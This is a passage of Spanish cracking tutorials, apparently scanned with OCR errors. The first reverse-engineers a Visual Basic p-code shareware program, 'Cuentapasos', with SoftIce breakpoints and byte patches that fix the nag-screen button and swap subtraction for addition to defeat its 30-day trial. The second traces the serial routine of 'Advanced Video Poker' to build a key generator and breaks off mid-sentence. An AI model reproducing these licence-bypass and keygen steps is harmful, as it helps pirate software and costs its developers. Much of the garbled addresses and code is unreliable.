aparece en la lista, si pinchamos en la etiqueta '"Windows' de la ventana de propiedades del 
botón podemos recorrenos sus predecesores, y al ser el último, no tiene sucesores. Veamos si 
esto es cierto cuando Aceptar cambia de sitio. Cerramos el Cuentapasos y lo ejecutamos hasta 
que el botón Aceptar sea el del centro. Volvemos a ir al Spy++ y el botón Aceptar..... joderl, 


¿mM 


ahora es el penúltimo. Será "joío". Parece que el autor se ha informado "demasiado bien”. 


Esto significa, que los botones no cambian de sitio, lo que cambia es la funcionalidad de cada 
uno de ellos, y la imagen que tienen incrustrada. No podemos distinguirlos por la posición, ni 
por el tamaño, ni por el texto, ni por la clase, .... 


Soluciones 


e Registrarnos. :-( 

e Aplicar la solución propuesta por bb en Simulating User Input to Eliminate Nag 
Screens. 

e "Amarrar" a ese travieso botoncito en un sitio fijo. 


La solución propuesta por bb, para el WinZip (un problema idéntico al nuestro) es utilizar la 
función GetPixel para poder distinguir qué imagen tiene cada botón. Para unas coordenadas 
dadas, esta función devuelve el color del pixel correspondiente. Conocemos las coordenadas de 
los dos botones, tan solo nos queda buscar un pixel en de los botones Aceptar y Salir que sean 
disitntos. Esto, con cualquier programa gráfico esta "chupao". Sería la solución ideal, ya que 
siempre debemos intentar modificar los menos posible el ejecutable de nuestra víctima. 


Como somos más chulos que un ocho, y lo que queremos es mostrar la facilidades que nos 
ofrece Visual Basic, vamos a "pegar" el botón Aceptar a un sitio fijo, para posteriormente, 
ametrallarlo a placer con PostMessage. Para hacer esto, tendremos que bucear en el código con 
ayuda del Softlce y del SmartCheck, y, lógicamente, cambiar algunas "cosillas" en las rutinas 


que deciden dónde se pone cada botón. Descubriremos la impactante sensación de "no me 


¿9 


entero de ná" que se experimenta inicialmente al sumergirnos en el p-code. Agarraros al ratón 
que el viaje va a ser movidito. 


P-Code: Descenso a los infiernos de Micro$oft 


Número aleatorios 


Antes de entrar en faena, es casi obligado leerse el fantástico tutorial de Esiel2, CRACKEANDO EN VISUAL BASIC. 


Aprenderéis todo lo básico para para crackear programas de Visual Basic, y cómo configurar nuestras herramientas 
adecuadamente para sacarles el máximo partido al atacar programas escritos en este lenguaje. 


Tal y como hacemos siempre que tenemos una pieza realizada en Visual Basic, recurrimos al alucinante SmartCheck. 
Arrancamos el SmartCheck, cargamos el programa y, lo primero que nos aparece, a modo de advertencia es lo siguiente: 


cpasos32.exe 1s compiled to p-code...etc... 


Se podría decir que los amigos de NuMega nos quieren advertir que bajo esas condiciones, nuestra ya esacasa salud mental 
puede correr peligro. Tenemos la oportunidad de arrepentirnos, como en toda aplicación de Windows que se precie, pero 
"semos” valientes y elegimos continuar. 


Inicialmente no vamos a necesitar las llamadas a la APL por lo que podemos habilitar la opción de suprimir las llamadas a la 
API. Ejecutamos el Cuentapasos desde el SmartCheck, habilitando desde el principio la captura de eventos, y nos acomodamos 
en la silla, para ver pasar la película. Cuando aparezca la nagscreen, nos fijamos que posición ocupa el botón Aceptar y 
pulsamos Salir . Como vamos a intentar localizar donde pueden estar las rutinas que deciden donde se situa cada botón con 
llegar a la nagscreen tenemos de sobra. 


Nos vamos a la zona en la que se carga la nagscreen, al final. Buscamos el evento frmRegistro_Load: 


15240 Ehe lbláceptoCondiciones. Caption <-- "Entiendo que puedo utilizar CuentaPasos para uso exclusivo de e" [String]l 

15241 Eh lbláceptoCondiciones.FontBold <-- False [Boolean] 

15242 he emdComoRegistrarse. Caption <-- "Comprar Programa P501092-1032-49" (String) 
23% And returns double:0,9741839 [displayed as sinale-precision floating point) 

15244 Ea imgácepto.Picture 

15245 Ene cmdáceptar(0]. Picture <-- ptr:DO52E634 (WT_PTR] 

15246 Ehe emdáceptar(0)MWéhatsThisHelplD <-- 26025 (Long) 

15247 Ea imgSalir. Picture 

15248 he emdáceptar(1). Picture <-- ptr.D0052E590 (WT_PTR] 

15249 he cmdáceptar(1] Cancel <-- True [Boolean] 

15250 Ehe cmdáceptar(1]WhatsThisHelplD <-- 26030 (Long) 


15251 ¿£ fimRegistro_Load 
15252 “>  fimRegistro.Show 
15295 9% Now 

15296 $% Month 

15297 -S  fimSplash.Hide 


Como puede verse, lo último que hace la aplicación al cargar la nagscreen es inicializar las propiedades de los botones. En esta 
ocasión, el botón Aceptar me ha salido a la izquierda, por lo que tus resultados serán distintos si te ha salido en el centro. Así, en 
el evento 15242, se asigna la propiedad Caption del botón que muestra la ayuda de como registrarse. A partir del evento 15244, 
se asignan las propiedades a otros dos botones que no pueden ser otros que lo que a nosotros nos traen de cabeza. Se cargan las 
imágenes 'imgAcepto' y 'imgSalir', y se asignan a la propiedad Picture de cada uno de los botones. Al botón 'emdAceptar(1)' se 
le activa la propiedad Cancel. Si desempolvamos la ayuda de Visual Basic, encontramos que si esta propiedad es TRUE, la tecla 
ESC activará al botón. Si volvemos a cargar el Cuentapasos (sin el SmartCheck) y pulsamos ESC en la nagscreen, la aplicación 
termina. Esto significa que en este caso el botón 'cmdAceptar(1)' está funcionando como Salir. Conclusión, 'emdAceptar(0)' es el 
botón de la izquierda y el otro el del centro. Esto podemos probarlo ejecutando varias veces el Cuentapasos, y viendo como al 
cambiar Aceptar al centro, la propiedad Cancel se la activa a 'emdAceptar(0). 


Veis lo que hay en el evento 15243. Justo después de inicializar el botón de Comprar y justo antes de los de Aceptar y Salir, se 
genera un número aleatorio mediante la función Rnd(). Por su delatadora situación, creo que todos apostaríamos el brazo a que 
la decisión de dónde se colocan los botones, tiene mucho que ver con el numerito obtenido. Si nos las amañamos para que dicho 
numerito tenga siempre un valor fijo, el botón Aceptar se quedará fijo. 


Vemos desde donde se invoca la función Rnd(), ¿desde "MSVBVMS50.DLL!000FE7BD"? Arrea, ¿qué es esto?. Comenzamos a 
mirar el resto de funciones y TODAS se ejecutan desde las direcciones OFE7BD y OFE7ED de MSVBVMS5O0.DLL, exceptuando 
aquellas que tengan que ver con objetos visuales (forms, botones,...) 


¿Se nos vuelve loco el SmartCheck con programas p-compilados? 


La puerta del sótano 


Vamos a ver si el Softlce nos aclara algo. Lo primero que debemos hacer, como con todos los programas de Visual Basic, es 
cargar los símbolos de las librerías de VB. En este caso, como nos lo ha "chivado" el SmartCheck, es la librería 
MSVBVMS50.DLL. Lo de "MSVBVM" debe ser algo así como MicroSoft Visual Basic Virtual Machine, o máquina virtual de 
Visual Basic (toda una máquina de torturas, ya vereis...) 


Consultamos cuál de las funciones que exporta, puede ser Rnd(). Tenéis un listado de todas las funciones que se exportan en el 
tutorial de Mr.Brown para VB5. Nos saltan a los ojos dos de ellas: 


Addr:0F004A95 Ord: 593 (0251h) Name: rtcRandomNext 
Addr :0F0O3AE08 Ord: 594 (0252h) Name: rtcRandomize 


Visual Basic dispone de dos funciones para generar números aleatorios: 


e Randomize. Se utiliza para inicializar el generador de números aletorios. El Cuentapasos la utiliza, por ejemplo, al 
inicio del frmRegistro_Load. 
e Rnd(). Devuelve un número aleatorio entre O y 1. 


La función Rnd() se corresponderá con la rtcRandomNext exportada por la DII. Lo primero que debemos ver es el número de 
veces que el Cuentapasos llama a la función Rnd() antes de la llamada que nos interesa. Nos colocamos en el SmartCheck y 
buscamos las llamadas a Rnd(). Se producen dos llamadas, la nuestra es la segunda. 


Bajada a los infiernos 


Nos vamos al Softlce, y colocamos un bpx rtcRandomNext. Volvemos al Windows y ejecutamos el Cuentapasos. Vemos como 
se carga el splash y ... BOOM... salta el Softlce. Como la que nos interesa es la segunda llamada, pulsamos Ctrl+D y enseguida 
vuelve a saltar el punto de ruptura. No nos importa que es lo que hace la función rtcRandomNext para generar el número 
aleatorio, solo nos interesa saber que es lo que el Cuentapasos se propone hacer con él. Pulsamos F11 y salimos justo destrás del 
call que llamó a la función, en la dirección OFOFE7COH de la DII del VB. 


La función Rnd() devuelve un número entre cero y uno, por lo que debe devolverlo en los registros de punto flotante. Para ver el 
contenido de esos registros desde Softlce escribimos wf. Efectivamente, el número aleatorio generado se encuentra en el registro 
STO. 


Empezamos a ejecutar paso a paso pulsando F8, y en seguida encontramos algo interesante: 


OFOFE7CC mov al, [esi] 
OFOFE7CE inc esi 
OFOFE7CF jmp ds: [eax*4+0FO0FED94] 


Cargamos en AL el contenido de la dirección apuntada por ESI (0F4h), incrementamos ESI y saltamos a una dirección que 
depende de lo que hemos leído con ESI. Si vemos a dónde esta apuntado ESL, descubriremos que está apuntando al código de 
nuestro querido Cuentapasos. 


Tras el salto, aterrizamos en OFOFDE15. Seguimos pulsando F8 y vemos como se carga en la pila un byte de valor OAh que está 
en el código del Cuentapasos (siempre apuntado por ESI). Nuevamente, uno de los bytes del código del ejecutable (OEBh) es 
utilizado para efectuar un salto exactamente igual que antes, al contenido de la dirección OEBh*4+0F0FED94=0FOFF140 


Esta vez vamos a parar a OFOFD3ES, en donde el OAh cargado anteriormente en la pila es volcado en el registro STO, 
desplazando el número aleatorio al ST1. Se elimina el OAh de la pila y se vuelve a realizar otro salto igual que el anterior. 


Caemos en OFOFDFCB. Vamos a parar un momento a ver si nos aclaramos la cabeza antes de que cometamos una locura con el 
monitor y la silla ... 


Una luz al final del pasillo... 


Nos desplazamos por la ventana de código y le echamos una mirada a los alrededores de donde estamos situados. Nos 
encontramos porciones de código de 5-10 instrucciones, todas terminadas por el mismo código que cité antes; carga de un byte 
apuntado por ESI en AL, incremento ESI y salto al contenido de la dirección calculada como EAX*44+0FOFED94h. 


Vamos a echarle un vistazo a esa especie de tabla de direcciones que parecen usar todas las porciones de código al terminar para 
proseguir con la ejecución. Miremos, por ejemplo, en la dirección OFOFF140h, que se cálculo al final de la parte de código que 
cargo el OAh del código del Cuentapasos en la pila. Encontramos en dicha dirección, OFOFDSES5h, que es la dirección de la 
porción de código en la que se carga el contenido de la pila en STO. Las direcciones que se encuentran alrededor, apuntan 
igualmente a porciones de código que al finalizar, vuelven a recurrir a esta tabla para ver a donde saltan. 


Del infierno al cielo 


Dicho en otras palabras, el ejecutable (cpasos32.exe) nunca es ejecutado. Su código es leído e interpretado completamente por la 
DIl. Por lo tanto, todas y cada una de las instrucciones en ensamblador que conocemos, tendrán que tener una porción de 
código en la DI] que las sustituya. 


Volvamos al inicio, a la dirección OFOFE7CCH, justo después de volver de la función Rnd(). Allí, cargamos del ejecutable un 
byte, OF4h, que nos hizo saltar a una dirección en la que se cargo el siguiente byte del ejecutable, OAh, en la pila. Por tanto, 
nuestro "push OAh" del ensamblador que en código máquina se codifica como "6A OA”, en p-code es "F4 OA". El F4h será 
interpretado como "introducir el siguiente byte en la pila" por la tabla situada en OFOFED9Ah, al ejecutarse con la DII. 


No es más que la filosofía de Visual Basic, en la que las funciones más generales no se implementan en los ejecutables, si no en 
unas librerías comunes a todas las aplicaciones de VB, pero llevada a sus últimas consecuencias. No solo se implementan en las 
librerías las funciones más usuales si no que además se meten TODAS las instrucciones que puede ejecutar la aplicación. 


Algunos pensarán, "Pues bien, es tan solo una especie de traducción rara que lo que hace es complicar las cosas. Es un lenguaje 
completamente interpretado. ¿Dónde está esa ventaja del p-code?". Si alguien no lo ve claro ahora, cuando ataquemos a las 
rutinas de cálculo del periodo restante de evaluación, se le abrirán los ojos. 


Clavando un botón 


Recordamos por donde íbamos. Se había generado un número aleatorio entre O y 1 que almacenamos en el registro STO. 
Posteriormente, cargamos un OAh del código del Cuentapasos en el registro STO, desplazando el número aleatorio a STI. 


Nos situamos en OFOFDFCB, en donde multiplicamos el contenido de los registros STO y ST1 almacenando el resultado en STO. 
Nuevo acceso a la tabla de interpretación y aparecemos en OFOFDSBS, en donde el contenido del registro STO es redondeado al 
entero más cercano y volcado a la pila. Se almacenan los flags FPU (que son como los flags de toda la vida pero exclusivos de 
los registros de coma flotante) en el registro EAX. 


Una nueva visita a la tabla y saltamos a OFOFDE28h para cargar un valor de 4 bytes del ejecutable (2) en la pila. En este caso es 
un "push" de una doble palabra, no de un byte. Otro paseo por la tabla y caemos en OFOFE013. Recuperamos de la pila el 2 
anterior en ECX, y lo que volcamos anteriormente del registro STO en EAX. Dividimos este último por el 2, almacenándose el 
cociente en EAX y el resto en EDX. Se vuelca el resto a la pila y nos disponemos a saltar a otro sitio. 


Del número aleatorio generado, tan solo nos queda el valor volcado a la pila. Al haberse dividido por dos, este valor será0 o 1. 
La aplicación decidirá las posiciones de los botones según este valor. Nos hemos quedado con el resto de la división: 


round(x*10) / 2 
donde 'x' es el número aleatorio generado, entre cero y uno. 


Pulsamos Ctrl+D para ejecutar completamente el Cuentapasos. Los que tuvierais como resto de la división un cero, ¿a qué tenéis 
el botón Aceptar a la izquierda? ¿A que los que lo tenéis en centro, el resto os daba uno? 


Podemos probar nuestra teoría tanto con el SmartCheck como con el Softlce (más rápido). Ejecutamos varias veces el 
Cuentapasos, capturando el valor aleatorio devuelto. Calculamos metalmente cual sería el resto y vemos si se corresponde con la 
ubicación del botón Aceptar. 


Todavía podemos ir más lejos. ¿Cómo influye el resto de la división en la elección de qué hace un botón y qué hace el otro? Si 
recordamos lo que vimos con el SmartCheck, 'cmdAceptar' es un array de dos botones. 'cmdAceptar(0) es el botón de la 
izquierda y 'cmdAceptar(1) el del centro. Lo que la aplicación parece hacer, es asignar la función de Aceptar a 


'emdAceptar(resto)' y Salir a 'cmdAceptar(resto xor 1). 


Vamos a inmovilizar el puto botoncito de los.... . Tenemos que obligar a que el resto de la división tome siempre el mismo valor, 
cero o uno, independientemente del número aleatorio generado. Se nos pueden ocurrir dos formas: 


e Cambiar las instrucciones. Después del ejercicio que acabamos de hacer, conocemos los códigos que corresponden a 
varias instrucciones (push, división, multiplicación,..).Así, por ejemplo, podríamos sustituir las instrucciones que 
multiplican, redondean y almacenan en pila el aleatorio generado por un "push 00000002" o un "push 00000001", que 
ya sabemos como se codifican en p-code. Así, en lugar de meter en la pila el aleatorio multiplicado por 10 y 
redondeado, meteríamos un entero fijo. Debemos tener la precaución de que el número de bytes de la instrucción falsa, 
sobreescriba completamente las instrucciones a las que sustituye, por que todavía no conocemos como es el "nop" ;-) 

e Cambiar los operandos. Está es la solución más fácil y segura. 


¿Qué operandos podemos cambiar? Pues tenemos el OAh (de la multiplicación) y el 0000002 (de la división). ¿Formas de 
obligar a que el resto de la división tome un valor fijo? Por lo menos dos: 


e Multiplicar el aleatorio por cero en lugar de diez. Resto de la división cero, Aceptar siempre a la izquierda. 
e Dividir por uno en lugar de dos. Resto de la división cero, Aceptar siempre a la izquierda. 


Si hemos descomprimido el ejecutable, podemos ir realizando los parches sobre disco para ir comprobando que efectivamente 
funcionan. Repetimos los pasos anteriores para ir anotando las direcciones en memoria en las que se encuentra el operando que 
deseamos cambiar, las cadenas que deberemos buscar para localizar estos operandos en el ejecutable descomprimido con un 
editor hexadecimal, etc.. Ya sabeis como se hace esto, ¿verdad? 


Reventamos el P-Code 


Ahora, nos olvidamos del Cuentapasos, del SoftlIce, de la vecinita esa que está tan buena.... y 
nos concentramos en lo que hemos descubierto sobre el p-code. 


Para enfrentarse contra programas en Visual Basic normales, muchos habréis leído tutoriales 
información sobre funciones clave de Visual Basic que en un momento dado nos pueden ser 
muy útiles. En casi todos, se recomienda la función __vbastrcomp, utilizada por Visual Basic 
para comparar cadenas de texto. Así, en programas en donde debes introducir una clave de 
registro alfanumérica, la aplicación, en algún sitio, deberá comparar la cadena introducida con 
la que la aplicación considera correcta. 


En programas escritos en otros lenguajes no interpretados, la rutina de comparación de las 
cadenas se incluye en el ejecutable. Sabemos que está ahí, pero no sabemos dónde. En Visual 
Basic, esa función es una de las que no se incluyen en el ejecutable, si no que se encuentra en 
las librerías compartidas con el resto de aplicaciones de VB. En el caso de __ vbastrcomp, nos 
basta con colocar un punto de ruptura en esta función. Como puede ser llamada muchas veces, 
podemos limitar el punto de ruptura a que la cadena a comparar sea la que introducimos. 


La facilidad de desproteger los programas en Visual Basic, radica en esta compartición de 
funciones, que nos permite conocer, para algunas tareas específicas, donde colocar nuestro 
punto de ruptura. 


En el caso del p-code, siguen utilizándose estas rutinas compartidas, pero la novedad es que 


ahora, no solo se comparten una serie limitada de funciones, sino que todas las instrucciones 
que puede ejecutar un programa se han portado a una serie de pequeñas "funciones" en las 
librerías del VB. Examinando la librería del VB, podremos identificar gran cantidad de 
instrucciones, algunas muy importantes. 


El Cuentapasos me permitirá ilustrar la importancia de este hecho con más claridad. 


30-6 =36 


Nos centramos en el cálculo de los días que nos restan para acabar el periodo de evaluación. La 
nagscreen y el 'acerca de...' del Cuentapasos nos muestran los días transcurridos y los días que 
nos restan. 


Ahora bien, ¿me puede decir alguien cómo puede cualquier aplicación (no solo el Cuentapasos), 
sabiendo los días transcurridos y el número de días máximo (30), calcular los días que nos 


Llegados a este punto algunos pensareis que Mr.Blue está completamente "grillao". La 
respuesta es clara, restando. La resta, en ensamblador, se realiza mediante la instrucción "SUB". 
¿Y cómo se hace en p-code? Pues como hemos visto, tiene que exisitir una porción de código en 
MSVBVMS50.DLL que se utilice para hacer la resta. ¿Vais cogiendo la onda...? ¿Sentís el 
cosquilleo por la espalda ....? 


Si localizamos dónde se encuentra esa porción de código, podemos colocar un punto de ruptura 
en ella. Puesto que cualquier programa realiza un montón de restas, tendremos que limitar este 
punto de ruptura a que los operandos tomen el valor que nos interesa. En el caso de los periodos 
de evaluación, limitaremos a que el operando del que se sustrae, tenga como valor el número de 
días de evaluación, o el número máximo de ejecuciones, o... Las posibilidades son enormes. 


¿Y dóde está esa función? Para encontrarla, podemos seguir traceando el programa, tarde o 
temprano hará una resta. O también podemos, si tenemos el VB, generarnos un p-code que haga 
restas, sumas y todas las funciones que queramos descubrir. No tenemos más que pasarlo por el 
Softlce. 


La resta nos la encontramos en OFOFDF78h, y el resto de funciones aritméticas se encuentran a 
su alrededor. Encontramos multiplicaciones de enteros, de flotantes, operaciones lógicas,... todo 
un surtido. 


La función de resta de enteros, al igual que la de suma de enteros que está más arriba, se 
encuentran para operadores de 16 bits y para operadores de 32 bits. Si queremos colocar puntos 
de ruptura, los tendremos que colocar por duplicado: 


O0FOFDF78 pop eax 

OFOFDF79 sub [esp], eax 
OFOFDF7C jo OFOFDACA 

0FOFDF82 xor eax, eax 

O0FOFDF84 mov al, [esi] 

0FOFDF86 inc esi 

O0FOFDF87 jmp ds: [eax*4+0F0FED94] 


Esta función, saca un operador de la pila y se lo resta al que queda en la misma. El resultado 
queda almacenado en la pila, saltando a OFOFDACAR en caso de overflow (EAX>(ESP)). 


En mi Cuentapasos, los días transcurridos son seis así que coloco un punto de ruptura en 
OFOFDF79 de la forma bpx OFOFDF79 if (*(esp)==1E) (eax==6). 


Lo colocamos también en la versión de 16 bits, por si las moscas: bpx OFOFDF62 if 
(* (esp) ==1E) € (ax==6). 


Pulsamos Ctrl+D, ejecutamos el Cuentapasos y aparecemos en OFOFDF79. Efectivamente, la 
aplicación está intentando hacer 30-6. Examinamos a donde apunta ESI. A la dirección 
4ADFA48h, del ejecutable del Cuentapasos. En realidad, ESI está ya apuntando a la siguiente 
instrucción a ejecutar (hace las veces de EIP). La instrucción que nos trajo aquí es el byte 
'OAER' de 4ADF47h. 


Aquí, al igual que en el caso anterior podemos cambiar dos cosas: 


e Los operandos. Para cambiarlos tendríamos que retroceder, poner un punto de ruptura 
antes y ver de donde saca el Cuentapasos los valores de los operandos. Para ello, lo 
mejor es colocar un punto de ruptura de acceso a memoria en direcciones anteriores a 
4ADF47h (nuestros antiguos bpx, se convierten en bpm's). Después traceamos y vamos 
viendo con atención de donde van saliendo los operandos (ingeniería inversa hacia 
atrás). 

e La instrucción. Podemos cambiar la resta por otra instrucción, o mejor, por una suma ;- 


) 


¿Como hacemos esto? ¿Cuál es el código de la suma? Veamos, el código de la resta (32 bits) 
como hemos visto es OAEh. La función de suma, nos la encontramos algo más arriba, en 
OFOFDF3DH. Para saber su código, nos vamos a la tabla de OFOFED94h. El puntero a la función 
resta, debe encontrarse en: 


4*0AEh + OFOFED94h = OFOFF04Ch 


Nos vamos allí, y efectivamente encontramos la dirección de la función resta de 32 bits. Vamos 
a ver donde está el puntero a la suma, no debe estar muy lejos. La encontramos cuatro palabras 
más arriba, en OFOFFO3Ch. El código de la suma será por tanto: 


(OFOFFO3Ch - OFOFED94h) / 4 =0AAh 


El crack consitirá en sustituir en aquellos lugares en donde se realice la resta, 30-6 (6 en mi 
caso), el código de la operación resta (DAERh) por el de la suma (OAAh). 


Pulsamos Ctrl+D y vuelve a saltar enseguida el Softlce. En esta ocasión, el culpable es el OVAEh 
situado en 4ADFA9h. Lo anotamos y volvemos a pulsar Ctrl+D. Nos aparece la nagscreen. 
Vamos a por el 'acerca de...”. Pulsamos Aceptar y abrimos el 'acerca de...' .. otra vez nos salta el 
Softlce, otro código de resta en 04A4716h. Anotamos y Ctrl+D... otro más en 04A4769h. Este 
es el último. 


Repetimos la prueba, pero ahora, en el primer punto de ruptura, sustituímos los bytes OAEHh de 
4ADF47h, 4ADFAJ9h, 4A4716h y 4A4769h por DAAh. Realizar un cargador que, además de 
pulsar el botón de la nagscreen tal y como se ha explicado, realice los parches en memoria 
necesarios es sencillo. Tenéis un ejemplo en otro tutorial de Esiel2, que casualmente versa sobre 
el antecesor del actual Cuentapasos. 


Quitamos los puntos de ruptura, para probar, Ctrl+D y ...... 


Leda ;-) p-code rulezzz!! 


Conclusiones. 


Hemos mostrado como una protección como la de la nagscreen, correctamente implementada 
por el autor de la aplicación, puede ser fácilmente burlada porque el autor cometió el "error" de 
programar en Visual Basic. De paso, hemos sacado del baúl una técnica casi olvidada pero de 
una gran potencia, mediante la cual podríamos entre otras cosas, automatizar tareas, rellenar 
formularios automáticamente, gastar bromas, etc... 


Hasta aquí, nada nuevo. 


La novedad es el p-code. Inicialmente, en una primera toma de contacto, los programas p-code 
confunden y pueden terminar por aburrir al más intrépido ingeniero inverso. Está invención de 
Microsoft, desde el punto de vista teórico, puede parecer un gran avance ya que está a un paso 
de la creación de programas que puedan ejecutarse en cualquier máquina, independientemente 
del procesador o sistema operativo, siempre y cuando existan unas librerías diseñadas para 
dicha máquina o sistema operativo que interpreten el código del ejecutable. 


Nada más lejos de la realidad. Lo que en código nativo es una simple instrucción como la resta, 
se convierte en los programas p-compilados en varias instrucciones. Igual ocurre con el resto: 
push, add,... Esto, inevitablemente conduce a que las aplicaciones se enlentezcan o, lo que es lo 
mismo, que necesitemos más recursos (procesadores más rápidos) para poder mantener las 
mismas prestaciones. Esta política de Microsoft, por supuesto favorece a los fabricantes de 
hardware como Intel. 


Desde el punto de vista de la ingeniería inversa, supone una metedura de pata más de Microsoft 
(y van ...). Identificando convenientemente las funciones de interés, podremos facilmente 
desentrañar las protecciones de las aplicaciones. En este tutorial se ha expuesto un método que 
puede, sistemáticamente, echar abajo casi cualquier sistema de protección de aplicaciones p- 
compiladas, basado en limitaciones en el número de ejecuciones, periodos de pruebas, etc... Es 
cuestión de acostumbrarse, donde poníamos antes breakpoints de ejecución ahora ponemos 
breakpoints de acceso a memoria, donde el EIP decía ahora dice el ES... 


En cierto modo es triste ver como los desvelos de un programador por proteger su aplicación, 
colocando protecciones a diestro y siniestro, y creando un sistema de protección en conjunto 
bastante robusto, salta en mil pedazos por el hecho de haber utilizado Visual Basic y su "p- 
compilación". Si el futuro del Visual Basic pasa por el p-code ... o le abrimos los ojos a los 


programadores y reaccionan o creo que la ingeniería inversa de VB se va a volver muy aburrida. 


Para ilustrar dicho método, lo hemos utilizado contra una de las pocas aplicaciones p- 
compiladas que he podido encontrar (por ahora): nuestro entrañable Cuentapasos. Pero no creais 
que sus protecciones se limitan tan solo a la nagscreen y al periodo de evaluación. ¡Que va! El 
Cuentapasos no se acaba ahí, esconde muchos más secretos. Desviaros de la senda seguida en 
este tutorial para deshacer su protección, buscad caminos alternativos. Quedan muchas 
preguntas por responder: 


e Dónde se guardan los días transcurridos? O se guarda la fecha de instalación? 

e Dónde se guarda el otro protagonista de la resta, el límite de 30 días? ¿Y si lo 
cambiamos? 

e Cómo se registra el programa? De dónde sale el código de compra? 

e Por qué no cambia el número de días transcurridos si cambio la fecha? Cuándo se 
actualiza? 

e El cálculo de los días transcurridos, es igual al ejecutar las primeras veces el 
Cuentapasos que después? 

e Por qué en algunos ordenadores se cierra el programa a los pocos minutos de conexión? 


Investigad, y os encontrareis destellos de calidad del programador, de los que da gusto encontrar 
en un producto nacional, y alguna que otra metedura de pata, de las que hacen que te caigas al 
suelo de risa ;-D 


Como veis, se podría escribir un libro sobre el Cuentapasos (este tutorial ya es casi un libro). 


En cierta manera somos nosotros los que obligamos a los programadores a profundizar en el 
arte de la programación. Y gran parte de lo que aprenden en el sano intento de "jodernos", lo 
aplican en otras facetas de sus aplicaciones, mejorando sus prestaciones. Aunque la mayoría no 
lo quieran reconocer, parte de lo que saben nos lo deben a nosotros, los "crackers". 


Y por supuestísimo, parte de lo que sabemos nosotros se lo debemos a las "comeduras de coco" 
de ellos a la hora de implementar una protección. 
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Whiskey Kon Tekila 


Programa Advanced Video Poker v1.1 | W95 / W98 / NT 
Descripción Juego de Poker al estilo Casino 
Tipo Shareware 


Url http://www.aha.ru/-aasamson/download/ 


[Protección | Número de Serie. Time Limit 30 Dias 

[Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 

| Herramientas  [Smartcheck v6.01 (Build 952) 

Objetivo | Buscar el número de serie y crear su Key-Generator 

Cracker [Mr.GReeN [WkT!] 

ea de Ags de 


Vi 


Introducción 


El programa es un clásico juego de Poker al estilo de los casinos norteamericanos, 
ameno y bonito. Su protección es de 30 dias, libre de nags o recordatorios que nos 
induzcan a registrar el programa. Pasados los 30 dias se acabó, no juegas más. 
Programa elaborado en Visual Basic e interesante para comenzar a usar Smartcheck 
para estudiar el comportamiento de la rutina generadora del número de serie 


Vi 


Manos a la obra! 


Cargamos Smartcheck y desde ahí lanzamos el programa que vamos a estudiar. Bien 
, vamos a incorporar gráficos para ilustrar mejor el comportamiento de Smrtck, de 
acuerdo? Así nos resultará más fácil de comprenderlo (y menos teclas a tocar pa mi 
xDDDD). Lanzamos el programa desde la opción Program/Start y una vez dentro de 
él nos vamos a la opción Register. Entramos como nombre: Usuario 
Registrado[WkT!] y como número de serie, mi número mágico: 9900990099, ¡vale, 
vamos allá! 


String [85] -> Integer [85] 


Integer (170) -> String (1 70") 


$% ValStrina:'170") retums double:170 [displayed as single-precision floating point 
$% Mid$íStrina: "Usuario..." long:2, VARIANT:Integer:3] 

»£ 

$% Asc(String: "Usuario ..."') retums Integer:85 

9% SiWVARIANT:Double:255) 

P. String ("255") --> Integer (255) 

A 

$% ValString:'"370") retums double:370 [displayed as single-precision floating point 
9% Mid$(Strino:"Usuario ...", long:3, VARIANT: Integer: 4) 


double:572 [displayed as single-precision floating point 
$% Mid$(String:"Usuario ...", long:4, VARIANT:Integer:5) 

9% AscíString: "ario '") retums Integer: 97 

$% AscíString: "Usuario ...”) retums Integer:85 

$% SiWVARIANT:Double:657) 


. 2 Cria MMLCERFRIAL s lrtrarmar (10571 


Mirad bien el comportamiento de la rutina. Toma el primer caracter del nombre y su 
código ASCII y se suma consigo mismo, al resultado le llamaremos SUMA 
(170=85+85), luego toma el segundo caracter (s) cuyo valor ASCH es 115, ok?, 


85 (cód ASCHU de "U"), sume- mos otra vez: 170+85+115= 370, ahora SUMA=370. 
Ya tenemos la fórmula, SUMA + Cód.ASCII del primer carácter del nombre + cód. 
ASCII de cada uno de los caracteres del nombre, al final, esto dá un resultado, en 
este caso: 4355, Bien qué hace, además, la ru- tina de cálculo del número de 
serie???, veamos: 


Integer (4355) --> String ("'4355""] 
WalíString:"'4355"] returns double:4355 [displayed as single-precisic 


Len(VARIANT[Double: 4355] feturns LONG:7793016 

Len(vARIANT|Double:8710) returns LONG:7793016 

Len(YARIA4NT|Double:85710] returns LONG:7793016 

Len(vARIA4NT bee returns LONG:7793016 
Len(YARIA4NTID ouble:1 4420] returns LONG:7733016 
LenfVARIANT returns LONG: 7793016 
Len VARIANT retums LONG:7793016 
Len(vARIANTiDouble:69680] returns LONG:7733016 
Len(YARIA4NT Double: 0) returns LONG:7793016 
LenfVARIANT:Double: 139360) retums LONG:7793016 


Len(vARIANT:Double:139360] retums LONG:7733016 
Len(YARIANT:D ouble: 278720] retums LONG:7793016 


do 
Le 
Lo 
% LenVARIANT:Double:278720]/retums LONG:7793016 
% Len(VARIANT:Double:557440)lretums LONG:7793016 
Lo 
do 
Lo 
Lo 
do 


ybbo4bo..e. y 
Lo fe Le Le fe £e Le £e ía 


Len(YARIANT:D ouble:557440) retuma LONG:7793016 

Len(váR ANTeuble 114860500) retumns LONG:7793016 
Len(vARIANT Double 114888+006] returns LONG:7793016 
Len(YARIANT:Double:2.22376e+006] returns LONG:7793016 


Len(YARIANT:Double:2.223976e+006] returns LONG:77393016 


el RATUARIT Mil A AE OOO tc MAI RINA 


Bueno, parece fácil, no?. 4355 * 2 = 8710; 8710 * 2 = 17420; etc. etc. etc...., pero 
cuan- tas veces realiza esta operación?, 36 veces, al final dá un número LONG que 
parece ser el número de serie deseado, veamos, despues de la larga cuenta, nos 
arroja: 748183302963- 20, parece un numero de serie en toda regla, pero aún no 
acaba la cosa aquí, porque si en- tramos este LONG, nos lo escupe con los siento 
Burt Lancaster, la cagaste. :) Así pues, con tinuamos. 


$% LenvAHIAN IU OUDIe: /.491938+U13) retums LUNA: /¿33U Ib 
$% Len(VARIANT:Double:7.48183e+013) retums LONG:7793016 


Len(ARIANT:Double:1.49637e+014) returns LONG:77393016 
Ea txtCode.Text 
Ela txiCode.Text 


Aqui, subrayadito esta: 149637e+014, o sea: 149636660592640, 
Uallllaaaaaaaaaa!!!!. Exito total, lo entramos y.... Thanks!!! el mensaje feliz! Yatá, I 
got it!!! That's all folk!!!. 


Pero que ha hecho?. Lo ha reducido. Mientras la cifra final sea mayor que 
